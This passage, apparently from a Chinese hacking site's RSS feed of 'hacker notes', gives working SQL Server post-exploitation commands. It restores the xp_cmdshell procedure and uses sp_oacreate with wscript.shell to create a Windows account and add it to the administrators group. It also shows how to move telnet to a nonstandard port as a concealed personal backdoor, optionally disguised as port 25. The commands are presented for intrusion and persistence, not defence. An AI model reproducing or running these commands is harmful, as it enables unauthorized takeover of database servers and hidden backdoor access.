然后按F5键命令执行完毕</p>
<p>3  无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)<br />
恢复方法：查询分离器连接后,<br />
第一步执行:exec sp_dropextendedproc &#8216;xp_cmdshell&#8217;<br />
第二步执行:exec sp_addextendedproc &#8216;xp_cmdshell&#8217;,'xpweb70.dll&#8217;<br />
然后按F5键命令执行完毕</p>
<p>四.终极方法.<br />
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:<br />
查询分离器连接后,<br />
2000servser系统:<br />
declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add&#8217;</p>
<p>declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\winnt\system32\cmd.exe /c net localgroup administrators  用户名 /add&#8217;</p>
<p>xp或2003server系统:</p>
<p>declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\windows\system32\cmd.exe /c net user 用户名 密码 /add&#8217;</p>
<p>declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add&#8217;</p>
<p>59、开23端口telnet的话，太危险了。<br />
大家都可以扫描到。就不是个人的后门了。。<br />
这里很简单只需要一句命令：<br />
tlntadmn config port=1001<br />
这句命令的意思是把telnet23端口改为1001<br />
大家可以自己更改在1025以内的端口。。可以欺骗性的改25。。呵呵</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/daxue-hacker-notes/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

